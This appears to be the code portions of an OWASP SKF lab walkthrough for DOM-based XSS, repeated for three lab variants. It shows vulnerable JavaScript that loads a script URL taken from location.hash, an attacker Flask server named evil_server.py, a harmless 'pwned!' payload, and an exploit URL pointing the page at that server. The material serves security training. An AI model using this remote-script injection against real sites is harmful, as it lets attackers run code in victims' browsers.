$ sudo docker pull blabla1337/owasp-skf-lab:xss-dom-2

$ sudo docker run -ti -p 127.0.0.1:5000:5000 blabla1337/owasp-skf-lab:xss-dom-2

$ sudo docker pull blabla1337/owasp-skf-lab:js-xss-dom2

$ sudo docker run -ti -p 127.0.0.1:5000:5000 blabla1337/owasp-skf-lab:js-xss-dom2

function loadWelcomeMessage() {
  setTimeout(function () {
    endpoint = location.hash.slice(5);
    var script = document.createElement("script");
    if (endpoint) {
      script.src = endpoint + "/js/welcome.js";
    } else {
      script.src = "/js/welcome.js";
    }
    document.head.appendChild(script);
  }, 2000);
}

endpoint = location.hash.slice(5);

from flask import Flask

app = Flask(__name__, static_url_path='/static', static_folder='static')
app.config['DEBUG'] = True

@app.route("/<path:path>")
def static_file(path):
    return app.send_static_file(path)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=1337)

$ pip3 install flask

document.getElementsByClassName("panel-body")[0].innerText = "pwned!";

$ python3 evil_server.py

http://0.0.0.0:5000/#xxxxhttp://0.0.0.0:1337

function loadWelcomeMessage() {
  setTimeout(function () {
    endpoint = location.hash.slice(5);
    var script = document.createElement("script");
    if (endpoint) {
      script.src = endpoint + "/js/welcome.js";
    } else {
      script.src = "/js/welcome.js";
    }
    document.head.appendChild(script);
  }, 2000);
}

endpoint = location.hash.slice(5);

from flask import Flask

app = Flask(__name__, static_url_path='/static', static_folder='static')
app.config['DEBUG'] = True

@app.route("/<path:path>")
def static_file(path):
    return app.send_static_file(path)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=1337)

$ pip3 install flask

document.getElementsByClassName("panel-body")[0].innerText = "pwned!";

$ python3 evil_server.py

http://0.0.0.0:5000/#xxxxhttp://0.0.0.0:1337

$ sudo docker pull blabla1337/owasp-skf-lab:java-xss-dom2

$ sudo docker run -ti -p 127.0.0.1:5000:5000 blabla1337/owasp-skf-lab:java-xss-dom2

function loadWelcomeMessage() {
  setTimeout(function () {
    endpoint = location.hash.slice(5);
    var script = document.createElement("script");
    if (endpoint) {
      script.src = endpoint + "/js/welcome.js";
    } else {
      script.src = "/js/welcome.js";
    }
    document.head.appendChild(script);
  }, 2000);
}

endpoint = location.hash.slice(5);

from flask import Flask

app = Flask(__name__, static_url_path='/static', static_folder='static')
app.config['DEBUG'] = True

@app.route("/<path:path>")
def static_file(path):
    return app.send_static_file(path)

if __name__ == "__main__":
    app.run(host='0.0.0.0', port=1337)

$ pip3 install flask

document.getElementsByClassName("panel-body")[0].innerText = "pwned!";

$ python3 evil_server.py

http://0.0.0.0:5000/#xxxxhttp://0.0.0.0:1337